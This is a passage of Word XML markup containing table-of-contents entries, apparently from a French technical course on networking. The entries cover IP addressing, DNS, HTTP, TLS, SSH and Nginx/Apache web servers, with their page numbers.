          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>492</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>54.2 Ce que chaque couche garantit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>493</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>54.3 Commutateurs, routeurs, passerelles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>493</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>54.4 TCP, UDP et QUIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>494</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>54.5 Latence, débit et perte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>495</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>55. Adressage IP, sous-réseaux et routage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>55.1 Une adresse, un masque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>55.2 Découper un réseau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>501</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>55.3 Adresses privées et NAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>501</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>55.4 Routage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>502</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>56. DNS : nommer, résoudre, diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>508</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>56.1 Une hiérarchie de délégations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>508</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>56.2 Le trajet d'une résolution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>509</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>56.3 Les types d'enregistrements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>510</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>56.4 TTL et propagation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>511</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>56.5 Diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>511</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>57. HTTP/1.1, HTTP/2 et HTTP/3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>516</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>57.1 Un protocole textuel devenu binaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>516</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>57.2 Méthodes et idempotence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>516</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>57.3 Codes de statut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>517</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>57.4 Les trois versions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>517</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>57.5 Compression et contenus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>518</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>57.6 Cache HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>519</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>58. TLS et certificats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>524</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>58.1 Trois garanties</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>524</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>58.2 Certificats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>525</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>58.3 Automatiser avec ACME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>525</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>58.4 Configurer correctement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>526</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>58.5 Diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>527</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>59. SSH : accès distant et tunnels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>532</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>59.1 Authentification par clé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>532</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>59.2 Fichier de configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>533</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>59.3 Tunnels et transferts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>534</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>59.4 Durcir le serveur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>535</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>59.5 Diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>535</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>60. Serveurs web : Nginx et Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>540</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>60.1 Trois rôles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>540</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>60.2 Nginx : une configuration par blocs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>541</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">60.3 Apache : modules et fichiers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>.htaccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>542</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>60.4 Journaux et en-têtes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>543</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>60.5 Diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
